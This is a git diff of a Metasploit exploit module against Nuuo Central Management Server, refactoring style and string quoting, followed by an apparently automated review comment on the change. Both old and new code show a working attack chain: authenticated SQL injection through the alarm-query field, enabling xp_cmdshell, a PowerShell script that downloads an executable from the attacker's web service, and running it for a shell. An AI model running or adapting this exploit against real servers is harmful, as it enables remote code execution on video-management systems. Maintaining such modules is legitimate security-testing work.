parent
f5afe98111
commit
73048edd97
|
@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Nuuo Central Management Authenticated SQL Server SQLi",
|
||||
'Name' => 'Nuuo Central Management Authenticated SQL Server SQLi',
|
||||
'Description' => %q{
|
||||
The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
|
||||
This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
|
||||
|
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'Nuuo Central Management Server <= v2.10.0', {} ],
|
||||
],
|
||||
'Privileged' => false, # we run as NETWORK_SERVICE
|
||||
'DisclosureDate' => "Oct 11 2018",
|
||||
'DisclosureDate' => 'Oct 11 2018',
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
|
@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def inject_sql(sql, final = false)
|
||||
sql = ["GETOPENALARM","DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
|
||||
sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"]
|
||||
if final
|
||||
nucs_send_msg_async(sql)
|
||||
else
|
||||
|
@ -63,12 +63,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# Handle incoming requests from the server
|
||||
def on_request_uri(cli, request)
|
||||
#print_status("on_request_uri called: #{request.inspect}")
|
||||
if (not @pl)
|
||||
unless @pl
|
||||
print_error("A request came in, but the payload wasn't ready yet!")
|
||||
return
|
||||
end
|
||||
print_good("Sending the payload to CMS...")
|
||||
print_good('Sending the payload to CMS...')
|
||||
@exe_sent = true
|
||||
send_response(cli, @pl)
|
||||
end
|
||||
|
@ -85,14 +84,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def exploit
|
||||
nucs_login
|
||||
|
||||
if @nucs_session == nil
|
||||
fail_with(Failure::Unknown, "Failed to login to Nuuo CMS")
|
||||
unless @nucs_session
|
||||
fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS')
|
||||
end
|
||||
|
||||
downfile = rand_text_alpha(8+rand(8))
|
||||
@pl = generate_payload_exe
|
||||
@exe_sent = false
|
||||
resource_uri = '/' + downfile
|
||||
resource_uri = "/#{rand_text_alpha(8..16)}"
|
||||
|
||||
#do not use SSL
|
||||
if datastore['SSL']
|
||||
|
@ -100,13 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
datastore['SSL'] = false
|
||||
end
|
||||
|
||||
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
|
||||
srv_host = Rex::Socket.source_address(rhost)
|
||||
else
|
||||
srv_host = datastore['SRVHOST']
|
||||
end
|
||||
|
||||
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
|
||||
service_url = "http://#{srvhost_addr}:#{srvport}#{resource_uri}"
|
||||
print_status("Starting up our web service on #{service_url} ...")
|
||||
start_service({'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req|
|
||||
|
@ -120,24 +112,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# we need to roll our own here instead of using the MSSQL mixins
|
||||
# (tried that and it doesn't work)
|
||||
print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
|
||||
filename = rand_text_alpha_lower(rand(8) + 2) + ".exe"
|
||||
download_pl = %{xp_cmdshell 'cd C:\\windows\\temp\\ && echo $storageDir=$pwd > wget.ps1 && echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && echo $url = "#{service_url}" >> wget.ps1 && echo $file = "#(unknown)" >> wget.ps1 && echo $webclient.DownloadFile($url,$file) >> wget.ps1 && powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
|
||||
filename = "#{rand_text_alpha_lower(8..10)}.exe"
|
||||
download_pl = %{xp_cmdshell }
|
||||
download_pl << %{'cd C:\\windows\\temp\\ && }
|
||||
download_pl << %{echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && }
|
||||
download_pl << %{echo $url = "#{service_url}" >> wget.ps1 && }
|
||||
download_pl << %{echo $file = "#(unknown)" >> wget.ps1 && }
|
||||
download_pl << %{echo $webclient.DownloadFile($url,$file) >> wget.ps1 && }
|
||||
download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
|
||||
|
||||
print_status("Injecting PowerShell payload")
|
||||
print_status('Injecting PowerShell payload')
|
||||
inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
|
||||
|
||||
counter = 0
|
||||
while (not @exe_sent || counter >= datastore['SLEEP'])
|
||||
sleep 1
|
||||
Rex.sleep(1)
|
||||
counter += 1
|
||||
end
|
||||
|
||||
if not @exe_sent
|
||||
fail_with(Failure::Unknown, "Could not get CMS to download the payload")
|
||||
unless @exe_sent
|
||||
fail_with(Failure::Unknown, 'Could not get CMS to download the payload')
|
||||
end
|
||||
|
||||
print_status("Executing shell...")
|
||||
print_status('Executing shell...')
|
||||
inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#(unknown)\""), true)
|
||||
handler
|
||||
end
|
||||
end
|
||||
|
|
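Review bot: The rewrite of `download_pl` in the last hunk drops the old `echo $storageDir=$pwd > wget.ps1` step, so every line is now appended with `>>` and nothing ever creates or truncates wget.ps1; the new script only behaves like the old one when no earlier wget.ps1 exists in that directory, otherwise stale lines are run first. If the `$storageDir` line was removed on purpose, the first remaining redirect should still truncate, e.g. `download_pl << %{echo $webclient = New-Object System.Net.WebClient > wget.ps1 && }`. Separately, building the command by mutating a bare `%{...}` literal with `<<` will raise FrozenError if this file has (or later gains) a `# frozen_string_literal: true` header, which I cannot see from here; collecting the fragments in an array and calling `join` avoids both that and the per-line `<<` noise. The `exploit` method this hunk sits in starts in the previous hunk.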